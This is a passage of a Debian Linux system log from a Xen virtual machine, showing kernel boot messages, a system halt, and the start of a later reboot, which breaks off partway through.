1318May 15 11:32:35 debian kernel: [ 0.008000] Calibrating delay loop (skipped), value calculated using timer frequency.. 5000.13 BogoMIPS (lpj=10000272)
1319May 15 11:32:35 debian kernel: [ 0.008000] Security Framework initialized
1320May 15 11:32:35 debian kernel: [ 0.008000] SELinux: Disabled at boot.
1321May 15 11:32:35 debian kernel: [ 0.008000] Dentry cache hash table entries: 2097152 (order: 12, 16777216 bytes)
1322May 15 11:32:35 debian kernel: [ 0.008000] Inode-cache hash table entries: 1048576 (order: 11, 8388608 bytes)
1323May 15 11:32:35 debian kernel: [ 0.008000] Mount-cache hash table entries: 256
1324May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys ns
1325May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys cpuacct
1326May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys devices
1327May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys freezer
1328May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys net_cls
1329May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1330May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1331May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1332May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
1333May 15 11:32:35 debian kernel: [ 0.008000] CPU 0/0x0 -> Node 0
1334May 15 11:32:35 debian kernel: [ 0.008000] mce: CPU supports 2 MCE banks
1335May 15 11:32:35 debian kernel: [ 0.008000] Performance Events: unsupported p6 CPU model 62 no PMU driver, software events only.
1336May 15 11:32:35 debian kernel: [ 0.009289] ACPI: Core revision 20090903
1337May 15 11:32:35 debian kernel: [ 0.012133] Not enabling x2apic, Intr-remapping init failed.
1338May 15 11:32:35 debian kernel: [ 0.012135] Setting APIC routing to physical flat
1339May 15 11:32:35 debian kernel: [ 0.014214] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=0 pin2=0
1340May 15 11:32:35 debian kernel: [ 0.053966] CPU0: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
1341May 15 11:32:35 debian kernel: [ 0.053982] installing Xen timer for CPU 0
1342May 15 11:32:35 debian kernel: [ 0.054162] Booting processor 1 APIC 0x2 ip 0x6000
1343May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#1
1344May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1345May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1346May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1347May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
1348May 15 11:32:35 debian kernel: [ 0.008000] CPU 1/0x2 -> Node 0
1349May 15 11:32:35 debian kernel: [ 0.140804] CPU1: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
1350May 15 11:32:35 debian kernel: [ 0.140859] checking TSC synchronization [CPU#0 -> CPU#1]: passed.
1351May 15 11:32:35 debian kernel: [ 0.144005] installing Xen timer for CPU 1
1352May 15 11:32:35 debian kernel: [ 0.144084] Booting processor 2 APIC 0x1 ip 0x6000
1353May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#2
1354May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1355May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1356May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1357May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
1358May 15 11:32:35 debian kernel: [ 0.008000] CPU 2/0x1 -> Node 0
1359May 15 11:32:35 debian kernel: [ 0.232868] CPU2: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
1360May 15 11:32:35 debian kernel: [ 0.232929] checking TSC synchronization [CPU#0 -> CPU#2]: passed.
1361May 15 11:32:35 debian kernel: [ 0.236007] installing Xen timer for CPU 2
1362May 15 11:32:35 debian kernel: [ 0.236108] Booting processor 3 APIC 0x3 ip 0x6000
1363May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#3
1364May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1365May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1366May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1367May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
1368May 15 11:32:35 debian kernel: [ 0.008000] CPU 3/0x3 -> Node 0
1369May 15 11:32:35 debian kernel: [ 0.324780] CPU3: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
1370May 15 11:32:35 debian kernel: [ 0.324850] checking TSC synchronization [CPU#0 -> CPU#3]: passed.
1371May 15 11:32:35 debian kernel: [ 0.328005] installing Xen timer for CPU 3
1372May 15 11:32:35 debian kernel: [ 0.328025] Brought up 4 CPUs
1373May 15 11:32:35 debian kernel: [ 0.328027] Total of 4 processors activated (20196.33 BogoMIPS).
1374May 15 11:32:35 debian kernel: [ 0.328773] devtmpfs: initialized
1375May 15 11:32:35 debian kernel: [ 0.332061] regulator: core version 0.5
1376May 15 11:32:35 debian kernel: [ 0.332072] NET: Registered protocol family 16
1377May 15 11:32:35 debian kernel: [ 0.332156] ACPI: bus type pci registered
1378May 15 11:32:35 debian kernel: [ 0.332387] PCI: Using configuration type 1 for base access
1379May 15 11:32:35 debian kernel: [ 0.332873] bio: create slab <bio-0> at 0
1380May 15 11:32:35 debian kernel: [ 0.379117] ACPI: Interpreter enabled
1381May 15 11:32:35 debian kernel: [ 0.379119] ACPI: (supports S0 S3 S4 S5)
1382May 15 11:32:35 debian kernel: [ 0.379133] ACPI: Using IOAPIC for interrupt routing
1383May 15 11:32:35 debian kernel: [ 0.457794] ACPI: No dock devices found.
1384May 15 11:32:35 debian kernel: [ 0.457956] ACPI: PCI Root Bridge [PCI0] (0000:00)
1385May 15 11:32:35 debian kernel: [ 0.462736] * Found PM-Timer Bug on the chipset. Due to workarounds for a bug,
1386May 15 11:32:35 debian kernel: [ 0.462737] * this clock source is slow. Consider trying other clock sources
1387May 15 11:32:35 debian kernel: [ 0.463902] pci 0000:00:01.3: quirk: region b000-b03f claimed by PIIX4 ACPI
1388May 15 11:32:35 debian kernel: [ 0.699319] ACPI: PCI Interrupt Link [LNKA] (IRQs *5 10 11)
1389May 15 11:32:35 debian kernel: [ 0.699698] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 *10 11)
1390May 15 11:32:35 debian kernel: [ 0.700019] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 10 *11)
1391May 15 11:32:35 debian kernel: [ 0.700380] ACPI: PCI Interrupt Link [LNKD] (IRQs *5 10 11)
1392May 15 11:32:35 debian kernel: [ 0.700653] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none
1393May 15 11:32:35 debian kernel: [ 0.700655] vgaarb: loaded
1394May 15 11:32:35 debian kernel: [ 0.700693] PCI: Using ACPI for IRQ routing
1395May 15 11:32:35 debian kernel: [ 0.700693] HPET: 3 timers in total, 0 timers will be used for per-cpu timer
1396May 15 11:32:35 debian kernel: [ 0.700693] hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0
1397May 15 11:32:35 debian kernel: [ 0.700693] hpet0: 3 comparators, 64-bit 62.500000 MHz counter
1398May 15 11:32:35 debian kernel: [ 0.708028] Switching to clocksource xen
1399May 15 11:32:35 debian kernel: [ 0.709101] pnp: PnP ACPI init
1400May 15 11:32:35 debian kernel: [ 0.709113] ACPI: bus type pnp registered
1401May 15 11:32:35 debian kernel: [ 0.747539] pnp: PnP ACPI: found 12 devices
1402May 15 11:32:35 debian kernel: [ 0.747541] ACPI: ACPI bus type pnp unregistered
1403May 15 11:32:35 debian kernel: [ 0.747551] system 00:00: iomem range 0x0-0x9ffff could not be reserved
1404May 15 11:32:35 debian kernel: [ 0.747557] system 00:03: ioport range 0x8a0-0x8a3 has been reserved
1405May 15 11:32:35 debian kernel: [ 0.747558] system 00:03: ioport range 0xcc0-0xccf has been reserved
1406May 15 11:32:35 debian kernel: [ 0.747560] system 00:03: ioport range 0x4d0-0x4d1 has been reserved
1407May 15 11:32:35 debian kernel: [ 0.747566] system 00:0b: ioport range 0x10c0-0x1141 has been reserved
1408May 15 11:32:35 debian kernel: [ 0.747568] system 00:0b: ioport range 0xb044-0xb047 has been reserved
1409May 15 11:32:35 debian kernel: [ 0.752641] NET: Registered protocol family 2
1410May 15 11:32:35 debian kernel: [ 0.752920] IP route cache hash table entries: 524288 (order: 10, 4194304 bytes)
1411May 15 11:32:35 debian kernel: [ 0.754409] TCP established hash table entries: 524288 (order: 11, 8388608 bytes)
1412May 15 11:32:35 debian kernel: [ 0.755645] TCP bind hash table entries: 65536 (order: 8, 1048576 bytes)
1413May 15 11:32:35 debian kernel: [ 0.755800] TCP: Hash tables configured (established 524288 bind 65536)
1414May 15 11:32:35 debian kernel: [ 0.755801] TCP reno registered
1415May 15 11:32:35 debian kernel: [ 0.755887] NET: Registered protocol family 1
1416May 15 11:32:35 debian kernel: [ 0.755899] pci 0000:00:00.0: Limiting direct PCI/PCI transfers
1417May 15 11:32:35 debian kernel: [ 0.755960] pci 0000:00:01.0: PIIX3: Enabling Passive Release
1418May 15 11:32:35 debian kernel: [ 0.756004] pci 0000:00:01.0: Activating ISA DMA hang workarounds
1419May 15 11:32:35 debian kernel: [ 0.756087] Unpacking initramfs...
1420May 15 11:32:35 debian kernel: [ 0.897823] Freeing initrd memory: 9114k freed
1421May 15 11:32:35 debian kernel: [ 0.900160] audit: initializing netlink socket (disabled)
1422May 15 11:32:35 debian kernel: [ 0.900169] type=2000 audit(1589556748.331:1): initialized
1423May 15 11:32:35 debian kernel: [ 0.903195] HugeTLB registered 2 MB page size, pre-allocated 0 pages
1424May 15 11:32:35 debian kernel: [ 0.904442] VFS: Disk quotas dquot_6.5.2
1425May 15 11:32:35 debian kernel: [ 0.904488] Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
1426May 15 11:32:35 debian kernel: [ 0.904546] msgmni has been set to 30148
1427May 15 11:32:35 debian kernel: [ 0.905183] alg: No test for stdrng (krng)
1428May 15 11:32:35 debian kernel: [ 0.905239] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 253)
1429May 15 11:32:35 debian kernel: [ 0.905241] io scheduler noop registered
1430May 15 11:32:35 debian kernel: [ 0.905242] io scheduler anticipatory registered
1431May 15 11:32:35 debian kernel: [ 0.905243] io scheduler deadline registered
1432May 15 11:32:35 debian kernel: [ 0.905276] io scheduler cfq registered (default)
1433May 15 11:32:35 debian kernel: [ 0.905491] xen-platform-pci 0000:00:03.0: PCI INT A -> GSI 28 (level, low) -> IRQ 28
1434May 15 11:32:35 debian kernel: [ 0.905526] Grant table initialized
1435May 15 11:32:35 debian kernel: [ 0.907463] Linux agpgart interface v0.103
1436May 15 11:32:35 debian kernel: [ 0.907481] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
1437May 15 11:32:35 debian kernel: [ 0.908501] serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1438May 15 11:32:35 debian kernel: [ 0.909962] 00:0a: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1439May 15 11:32:35 debian kernel: [ 0.910052] input: Macintosh mouse button emulation as /devices/virtual/input/input0
1440May 15 11:32:35 debian kernel: [ 0.910089] PNP: PS/2 Controller [PNP0303:PS2K,PNP0f13:PS2M] at 0x60,0x64 irq 1,12
1441May 15 11:32:35 debian kernel: [ 0.912030] serio: i8042 KBD port at 0x60,0x64 irq 1
1442May 15 11:32:35 debian kernel: [ 0.912048] serio: i8042 AUX port at 0x60,0x64 irq 12
1443May 15 11:32:35 debian kernel: [ 0.912117] mice: PS/2 mouse device common for all mice
1444May 15 11:32:35 debian kernel: [ 0.912500] rtc_cmos 00:05: rtc core: registered rtc_cmos as rtc0
1445May 15 11:32:35 debian kernel: [ 0.912651] rtc0: alarms up to one day, 114 bytes nvram, hpet irqs
1446May 15 11:32:35 debian kernel: [ 0.912658] cpuidle: using governor ladder
1447May 15 11:32:35 debian kernel: [ 0.912659] cpuidle: using governor menu
1448May 15 11:32:35 debian kernel: [ 0.912663] No iBFT detected.
1449May 15 11:32:35 debian kernel: [ 0.913109] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1
1450May 15 11:32:35 debian kernel: [ 0.913149] TCP cubic registered
1451May 15 11:32:35 debian kernel: [ 0.913401] NET: Registered protocol family 10
1452May 15 11:32:35 debian kernel: [ 0.913919] Mobile IPv6
1453May 15 11:32:35 debian kernel: [ 0.913921] NET: Registered protocol family 17
1454May 15 11:32:35 debian kernel: [ 0.913982] registered taskstats version 1
1455May 15 11:32:35 debian kernel: [ 0.914520] XENBUS: Device with no driver: device/vbd/768
1456May 15 11:32:35 debian kernel: [ 0.914521] XENBUS: Device with no driver: device/vbd/51728
1457May 15 11:32:35 debian kernel: [ 0.914522] XENBUS: Device with no driver: device/vbd/51744
1458May 15 11:32:35 debian kernel: [ 0.914523] XENBUS: Device with no driver: device/vif/0
1459May 15 11:32:35 debian kernel: [ 0.914524] XENBUS: Device with no driver: device/console/0
1460May 15 11:32:35 debian kernel: [ 0.914615] rtc_cmos 00:05: setting system clock to 2020-05-15 15:32:28 UTC (1589556748)
1461May 15 11:32:35 debian kernel: [ 0.914637] Initalizing network drop monitor service
1462May 15 11:32:35 debian kernel: [ 0.914715] Freeing unused kernel memory: 592k freed
1463May 15 11:32:35 debian kernel: [ 0.914839] Write protecting the kernel read-only data: 4236k
1464May 15 11:32:35 debian kernel: [ 0.927946] udev[78]: starting version 164
1465May 15 11:32:35 debian kernel: [ 0.951102] SCSI subsystem initialized
1466May 15 11:32:35 debian kernel: [ 0.952802] Initialising Xen virtual ethernet driver.
1467May 15 11:32:35 debian kernel: [ 0.962944] xvda: xvda1 xvda2 < xvda5 >
1468May 15 11:32:35 debian kernel: [ 0.966729] blkfront: xvdb: barriers enabled
1469May 15 11:32:35 debian kernel: [ 0.966929] xvdb:
1470May 15 11:32:35 debian kernel: [ 0.967282] unknown partition table
1471May 15 11:32:35 debian kernel: [ 0.968819] blkfront: xvdc: barriers enabled
1472May 15 11:32:35 debian kernel: [ 0.969086] xvdc: unknown partition table
1473May 15 11:32:35 debian kernel: [ 0.969540] scsi0 : ata_piix
1474May 15 11:32:35 debian kernel: [ 0.969713] scsi1 : ata_piix
1475May 15 11:32:35 debian kernel: [ 0.969759] ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc100 irq 14
1476May 15 11:32:35 debian kernel: [ 0.969761] ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc108 irq 15
1477May 15 11:32:35 debian kernel: [ 0.979084] FDC 0 is a S82078B
1478May 15 11:32:35 debian kernel: [ 1.176074] PM: Starting manual resume from disk
1479May 15 11:32:35 debian kernel: [ 1.185140] kjournald starting. Commit interval 5 seconds
1480May 15 11:32:35 debian kernel: [ 1.185151] EXT3-fs: mounted filesystem with ordered data mode.
1481May 15 11:32:35 debian kernel: [ 2.289584] udev[339]: starting version 164
1482May 15 11:32:35 debian kernel: [ 2.332372] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input2
1483May 15 11:32:35 debian kernel: [ 2.332379] ACPI: Power Button [PWRF]
1484May 15 11:32:35 debian kernel: [ 2.332437] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input3
1485May 15 11:32:35 debian kernel: [ 2.332441] ACPI: Sleep Button [SLPF]
1486May 15 11:32:35 debian kernel: [ 2.343205] processor LNXCPU:00: registered as cooling_device0
1487May 15 11:32:35 debian kernel: [ 2.343475] processor LNXCPU:01: registered as cooling_device1
1488May 15 11:32:35 debian kernel: [ 2.343728] processor LNXCPU:02: registered as cooling_device2
1489May 15 11:32:35 debian kernel: [ 2.343982] processor LNXCPU:03: registered as cooling_device3
1490May 15 11:32:35 debian kernel: [ 2.360726] input: PC Speaker as /devices/platform/pcspkr/input/input4
1491May 15 11:32:35 debian kernel: [ 2.820623] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input5
1492May 15 11:32:35 debian kernel: [ 5.629383] Adding 901112k swap on /dev/xvda5. Priority:-1 extents:1 across:901112k SS
1493May 15 11:32:35 debian kernel: [ 5.775956] EXT3 FS on xvda1, internal journal
1494May 15 11:32:35 debian kernel: [ 5.798673] loop: module loaded
1495May 15 11:32:35 debian kernel: [ 6.580711] RPC: Registered udp transport module.
1496May 15 11:32:35 debian kernel: [ 6.580713] RPC: Registered tcp transport module.
1497May 15 11:32:35 debian kernel: [ 6.580714] RPC: Registered tcp NFSv4.1 backchannel transport module.
1498May 15 11:32:35 debian kernel: [ 6.591513] Slow work thread pool: Starting up
1499May 15 11:32:35 debian kernel: [ 6.591740] Slow work thread pool: Ready
1500May 15 11:32:35 debian kernel: [ 6.591793] FS-Cache: Loaded
1501May 15 11:32:35 debian kernel: [ 6.605817] FS-Cache: Netfs 'nfs' registered for caching
1502May 15 11:32:35 debian kernel: [ 6.616039] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
1503May 15 11:32:35 debian kernel: [ 7.490118] svc: failed to register lockdv1 RPC service (errno 97).
1504May 15 11:32:35 debian kernel: [ 7.491624] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
1505May 15 11:32:35 debian kernel: [ 7.492030] NFSD: starting 90-second grace period
1506May 15 11:35:57 debian shutdown[2323]: shutting down for system halt
1507May 15 11:35:58 debian kernel: [ 211.362471] nfsd: last server has exited, flushing export cache
1508May 15 11:36:04 debian kernel: Kernel logging (proc) stopped.
1509May 15 11:36:04 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1418" x-info="http://www.rsyslog.com"] exiting on signal 15.
1510Jan 17 19:55:44 debian kernel: imklog 4.6.4, log source = /proc/kmsg started.
1511Jan 17 19:55:44 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1562" x-info="http://www.rsyslog.com"] (re)start
1512Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing cgroup subsys cpuset
1513Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing cgroup subsys cpu
1514Jan 17 19:55:44 debian kernel: [ 0.000000] Linux version 2.6.32-5-amd64 (Debian 2.6.32-48squeeze6) (jmm@debian.org) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Tue May 13 16:34:35 UTC 2014
1515Jan 17 19:55:44 debian kernel: [ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
1516Jan 17 19:55:44 debian kernel: [ 0.000000] KERNEL supported cpus:
1517Jan 17 19:55:44 debian kernel: [ 0.000000] Intel GenuineIntel
1518Jan 17 19:55:44 debian kernel: [ 0.000000] AMD AuthenticAMD
1519Jan 17 19:55:44 debian kernel: [ 0.000000] Centaur CentaurHauls
1520Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-provided physical RAM map:
1521Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 0000000000000000 - 000000000009e000 (usable)
1522Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 000000000009e000 - 00000000000a0000 (reserved)
1523Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved)
1524Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 0000000000100000 - 0000000020000000 (usable)
1525Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 00000000fc000000 - 0000000100000000 (reserved)
1526Jan 17 19:55:44 debian kernel: [ 0.000000] DMI 2.7 present.
1527Jan 17 19:55:44 debian kernel: [ 0.000000] last_pfn = 0x20000 max_arch_pfn = 0x400000000
1528Jan 17 19:55:44 debian kernel: [ 0.000000] x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106
1529Jan 17 19:55:44 debian kernel: [ 0.000000] init_memory_mapping: 0000000000000000-0000000020000000
1530Jan 17 19:55:44 debian kernel: [ 0.000000] RAMDISK: 17759000 - 1803fa59
1531Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: RSDP 00000000000ea020 00024 (v02 Xen)
1532Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: XSDT 00000000fc00e2a0 00054 (v01 Xen HVM 00000000 HVML 00000000)
1533Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: FACP 00000000fc00df60 000F4 (v04 Xen HVM 00000000 HVML 00000000)
1534Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: DSDT 00000000fc0021c0 0BD19 (v02 Xen HVM 00000000 INTL 20090123)
1535Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: FACS 00000000fc002180 00040
1536Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: APIC 00000000fc00e060 000D8 (v02 Xen HVM 00000000 HVML 00000000)
1537Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: HPET 00000000fc00e1b0 00038 (v01 Xen HVM 00000000 HVML 00000000)
1538Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: WAET 00000000fc00e1f0 00028 (v01 Xen HVM 00000000 HVML 00000000)
1539Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e220 00031 (v02 Xen HVM 00000000 INTL 20090123)
1540Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e260 00033 (v02 Xen HVM 00000000 INTL 20090123)
1541Jan 17 19:55:44 debian kernel: [ 0.000000] No NUMA configuration found
1542Jan 17 19:55:44 debian kernel: [ 0.000000] Faking a node at 0000000000000000-0000000020000000
1543Jan 17 19:55:44 debian kernel: [ 0.000000] Bootmem setup node 0 0000000000000000-0000000020000000
1544Jan 17 19:55:44 debian kernel: [ 0.000000] NODE_DATA [0000000000008000 - 000000000000ffff]
1545Jan 17 19:55:44 debian kernel: [ 0.000000] bootmap [0000000000010000 - 0000000000013fff] pages 4
1546Jan 17 19:55:44 debian kernel: [ 0.000000] (6 early reservations) ==> bootmem [0000000000 - 0020000000]
1547Jan 17 19:55:44 debian kernel: [ 0.000000] #0 [0000000000 - 0000001000] BIOS data page ==> [0000000000 - 0000001000]
1548Jan 17 19:55:44 debian kernel: [ 0.000000] #1 [0000006000 - 0000008000] TRAMPOLINE ==> [0000006000 - 0000008000]
1549Jan 17 19:55:44 debian kernel: [ 0.000000] #2 [0001000000 - 00016d7584] TEXT DATA BSS ==> [0001000000 - 00016d7584]
1550Jan 17 19:55:44 debian kernel: [ 0.000000] #3 [0017759000 - 001803fa59] RAMDISK ==> [0017759000 - 001803fa59]
1551Jan 17 19:55:44 debian kernel: [ 0.000000] #4 [000009e000 - 0000100000] BIOS reserved ==> [000009e000 - 0000100000]
1552Jan 17 19:55:44 debian kernel: [ 0.000000] #5 [00016d8000 - 00016d80c8] BRK ==> [00016d8000 - 00016d80c8]
1553Jan 17 19:55:44 debian kernel: [ 0.000000] found SMP MP-table at [ffff8800000fbc50] fbc50
1554Jan 17 19:55:44 debian kernel: [ 0.000000] Zone PFN ranges:
1555Jan 17 19:55:44 debian kernel: [ 0.000000] DMA 0x00000000 -> 0x00001000
1556Jan 17 19:55:44 debian kernel: [ 0.000000] DMA32 0x00001000 -> 0x00100000
1557Jan 17 19:55:44 debian kernel: [ 0.000000] Normal 0x00100000 -> 0x00100000
1558Jan 17 19:55:44 debian kernel: [ 0.000000] Movable zone start PFN for each node
1559Jan 17 19:55:44 debian kernel: [ 0.000000] early_node_map[2] active PFN ranges
1560Jan 17 19:55:44 debian kernel: [ 0.000000] 0: 0x00000000 -> 0x0000009e
1561Jan 17 19:55:44 debian kernel: [ 0.000000] 0: 0x00000100 -> 0x00020000
1562Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: PM-Timer IO Port: 0xb008
1563Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
1564Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x00] disabled)
1565Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x02] lapic_id[0x00] disabled)
1566Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x03] lapic_id[0x00] disabled)
1567Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x04] lapic_id[0x00] disabled)
1568Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x05] lapic_id[0x00] disabled)
1569Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x06] lapic_id[0x00] disabled)
1570Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x07] lapic_id[0x00] disabled)
1571Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x08] lapic_id[0x00] disabled)
1572Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x09] lapic_id[0x00] disabled)
1573Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0a] lapic_id[0x00] disabled)
1574Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0b] lapic_id[0x00] disabled)
1575Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0c] lapic_id[0x00] disabled)
1576Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0d] lapic_id[0x00] disabled)
1577Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0e] lapic_id[0x00] disabled)
1578Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0])
1579Jan 17 19:55:44 debian kernel: [ 0.000000] IOAPIC[0]: apic_id 1, version 17, address 0xfec00000, GSI 0-47
1580Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
1581Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 5 global_irq 5 low level)
1582Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 10 global_irq 10 low level)
1583Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 11 global_irq 11 low level)
1584Jan 17 19:55:44 debian kernel: [ 0.000000] Using ACPI (MADT) for SMP configuration information
1585Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: HPET id: 0x8086a201 base: 0xfed00000
1586Jan 17 19:55:44 debian kernel: [ 0.000000] SMP: Allowing 15 CPUs, 14 hotplug CPUs
1587Jan 17 19:55:44 debian kernel: [ 0.000000] Xen version 4.2.
1588Jan 17 19:55:44 debian kernel: [ 0.000000] Netfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated NICs.
1589Jan 17 19:55:44 debian kernel: [ 0.000000] Blkfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated disks.
1590Jan 17 19:55:44 debian kernel: [ 0.000000] You might have to change the root device
1591Jan 17 19:55:44 debian kernel: [ 0.000000] from /dev/hd[a-d] to /dev/xvd[a-d]
1592Jan 17 19:55:44 debian kernel: [ 0.000000] in your root= kernel command line option
1593Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 000000000009e000 - 00000000000a0000
1594Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000a0000 - 00000000000e0000
1595Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000e0000 - 0000000000100000
1596Jan 17 19:55:44 debian kernel: [ 0.000000] Allocating PCI resources starting at 20000000 (gap: 20000000:dc000000)
1597Jan 17 19:55:44 debian kernel: [ 0.000000] Booting paravirtualized kernel on Xen
1598Jan 17 19:55:44 debian kernel: [ 0.000000] NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:15 nr_node_ids:1
1599Jan 17 19:55:44 debian kernel: [ 0.000000] PERCPU: Embedded 30 pages/cpu @ffff880001800000 s90392 r8192 d24296 u131072
1600Jan 17 19:55:44 debian kernel: [ 0.000000] pcpu-alloc: s90392 r8192 d24296 u131072 alloc=1*2097152
1601Jan 17 19:55:44 debian kernel: [ 0.000000] pcpu-alloc: [0] 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 --
1602Jan 17 19:55:44 debian kernel: [ 0.000000] Built 1 zonelists in Node order, mobility grouping on. Total pages: 129081
1603Jan 17 19:55:44 debian kernel: [ 0.000000] Policy zone: DMA32
1604Jan 17 19:55:44 debian kernel: [ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
1605Jan 17 19:55:44 debian kernel: [ 0.000000] PID hash table entries: 2048 (order: 2, 16384 bytes)
1606Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing CPU#0
1607Jan 17 19:55:44 debian kernel: [ 0.000000] xsave/xrstor: enabled xstate_bv 0x7, cntxt size 0x340
